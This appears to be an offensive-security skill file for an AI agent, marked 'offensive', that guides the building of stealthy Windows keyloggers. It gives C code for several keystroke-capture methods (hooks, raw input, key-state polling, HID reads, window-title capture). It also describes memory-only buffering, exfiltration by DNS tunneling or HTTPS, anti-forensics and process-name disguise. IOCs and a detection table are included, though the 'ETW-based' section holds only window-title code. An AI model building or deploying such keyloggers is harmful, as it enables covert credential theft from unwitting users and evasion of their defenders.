name: keylogger-architecture
description: Use when designing or analyzing keystroke/input capture — SetWindowsHookEx, raw input devices, ETW-based capture, kernel drivers, stealth techniques and their IOCs
metadata:
type: offensive
phase: research
kill_chain:
phase: [install, actions]
step: [5, 7]
attck_tactics: [TA0003, TA0009]
depends_on: [privesc-windows, edr-evasion]
feeds_into: [red-team-ops]
inputs: [target_os, edr_product]
outputs: [keylogger_binary, captured_input]
Keylogger Architecture
When to Activate
- Understanding input capture mechanisms for red team implants
- Analyzing malware keylogging capabilities
- EDR evasion research for input monitoring
- Designing stealthy credential capture
Method 1: SetWindowsHookEx (WH_KEYBOARD_LL)
How It Works
HHOOK hHook = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, hInstance, 0);
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
if (nCode == HC_ACTION) {
KBDLLHOOKSTRUCT *kb = (KBDLLHOOKSTRUCT*)lParam;
if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
LogKey(kb->vkCode);
}
}
return CallNextHookEx(NULL, nCode, wParam, lParam);
}
MSG msg;
while (GetMessage(&msg, NULL, 0, 0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
Internal Mechanism
SetWindowsHookEx → NtUserSetWindowsHookEx in win32k.sys
- Kernel creates HOOK structure, inserts at head of global hook chain
- Low-level hooks (WH_KEYBOARD_LL): NO DLL injection — events delivered via internal message to installing process
- Regular hooks (WH_KEYBOARD): DLL injected into every target process via APC
IOCs
- Hook entry visible in
!hook WinDbg command
- Installing thread must pump messages (detectable by message queue footprint)
- If regular hook: mapped DLL in every hooked process (VAD artifact)
- EDR can hook
user32!SetWindowsHookEx to detect installation
Method 2: RegisterRawInputDevices
How It Works
RAWINPUTDEVICE rid;
rid.usUsagePage = 0x01;
rid.usUsage = 0x06;
rid.dwFlags = RIDEV_INPUTSINK;
rid.hwndTarget = hWnd;
RegisterRawInputDevices(&rid, 1, sizeof(rid));
case WM_INPUT: {
RAWINPUT raw;
UINT size = sizeof(raw);
GetRawInputData((HRAWINPUT)lParam, RID_INPUT, &raw, &size, sizeof(RAWINPUTHEADER));
if (raw.header.dwType == RIM_TYPEKEYBOARD) {
LogKey(raw.data.keyboard.VKey);
}
}
Advantages Over Hooks
- Does NOT appear in
!hook list
- No cross-process DLL mapping
- Invisible to most EDR "hook chain" sensors
- No
CallNextHookEx chain dependency
IOCs
- ETW event from kernel (win32kfull.sys):
EtwTraceAuditApiRegisterRawInputDevices
- Contains PID, TID, UsagePage, Usage, Flags
- Channel is ON by default, CANNOT be disabled without kernel patch
- This is the strongest IOC — do not discount it
- Process must have window station and desktop
- Process must pump messages continuously
Method 3: GetAsyncKeyState Polling
while (true) {
for (int key = 0; key < 256; key++) {
if (GetAsyncKeyState(key) & 0x0001) {
LogKey(key);
}
}
Sleep(10);
}
IOCs
- High CPU usage from polling loop
- Detectable by API call frequency monitoring
- No kernel-level artifacts
- Least stealthy but simplest to implement
Method 4: DirectInput / Raw HID Device
HANDLE hKeyboard = CreateFile(L"\\\\?\\HID#VID_xxxx&PID_xxxx",
GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
ReadFile(hKeyboard, buffer, sizeof(buffer), &bytesRead, &overlapped);
IOCs
- Requires admin/SYSTEM privileges
- Creates IRP_MJ_READ telemetry on keyboard device
- Bypasses all userland monitoring
- Detectable by kernel-mode ETW or minifilter
Method 5: ETW-Based Capture (Defensive Turned Offensive)
Window Title Capture (Context Filtering)
GetWindowTextA / GetForegroundWindow
HWND fg = GetForegroundWindow();
char title[256];
GetWindowTextA(fg, title, sizeof(title));
Stealthier: NtUserInternalGetWindowText
typedef BOOL (WINAPI *pNtUserInternalGetWindowText)(HWND, LPWSTR, INT);
pNtUserInternalGetWindowText fn = GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserInternalGetWindowText");
WCHAR title[256];
fn(hWnd, title, 256);
Stealth Techniques
Memory-Only Operation
- Never write keystrokes to disk
- Buffer in encrypted memory, exfiltrate periodically
- Use sleep masking to encrypt buffer during idle
Exfiltration Methods
- DNS tunneling (encode keystrokes in subdomain queries)
- HTTPS POST to legitimate-looking endpoint
- Append to legitimate application traffic (piggyback)
- Store in registry/ADS, retrieve separately
Anti-Forensics
- Encrypt keystroke buffer with session key
- Overwrite buffer after exfiltration
- No persistent artifacts on disk
- Blend process name with legitimate software
Detection Comparison
| Method | Stealth | Privileges | Primary IOC |
|---|
| SetWindowsHookEx (LL) | Low | User | Hook chain, message pump |
| SetWindowsHookEx (regular) | Very Low | User | DLL in every process |
| RegisterRawInputDevices | Medium | User | ETW kernel event |
| GetAsyncKeyState | Low | User | CPU usage, API frequency |
| Direct HID device | High | Admin | IRP telemetry |
| ETW-based | High | Admin | Provider subscription |
| Kernel driver | Very High | Admin/SYSTEM | Driver load event |